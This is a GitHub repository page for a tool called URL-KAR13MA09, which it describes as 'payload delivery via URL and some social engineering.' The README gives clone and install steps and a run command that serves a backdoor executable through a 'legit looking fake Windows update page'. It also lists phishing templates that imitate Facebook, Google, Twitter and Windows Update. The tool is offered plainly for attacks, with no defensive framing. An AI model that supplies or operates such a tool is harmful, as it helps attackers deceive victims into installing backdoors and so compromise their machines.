Skip to content

KAR13MA090/URLKAR13MA09

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

URL-KAR13MA09

Payload delivery via URL and some social engineering.

This code write by KAR13MA09

███╗   ██╗████████╗████████╗████████╗ 
████╗  ██║╚══██╔══╝╚══██╔══╝╚══██╔══╝ 
██╔██╗ ██║   ██║        ██║      ██║     
██║╚██╗██║   ██║        ██║      ██║  
██║ ╚████║   ██║        ██║      ██║     
╚═╝  ╚═══╝   ╚═╝        ╚═╝      ╚═╝   

Running URL-KAR13MA09

sudo python3 url.py -t windows -p /home/user/backdoors/windows_update.exe

The above command will start a Legit looking fake Windows update page that triggers file download.

Installation

git clone https://github.com/KAR13MA090/URLKAR13MA09
cd URLKAR13MA09
python3 -m pip install -r requirements.txt

Usage

$ python3 url.py --help
usage: url.py [-h] --t T --p P
optional arguments:
    -h,    --help     Show this help message and exit.
  --t T, -template T  The template to use.
  --p P, -payload P   The path of payload to send.

Templates

[Info] Facebook
[Info] Google 
[Info] Twitter
[Info] Windows Update

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published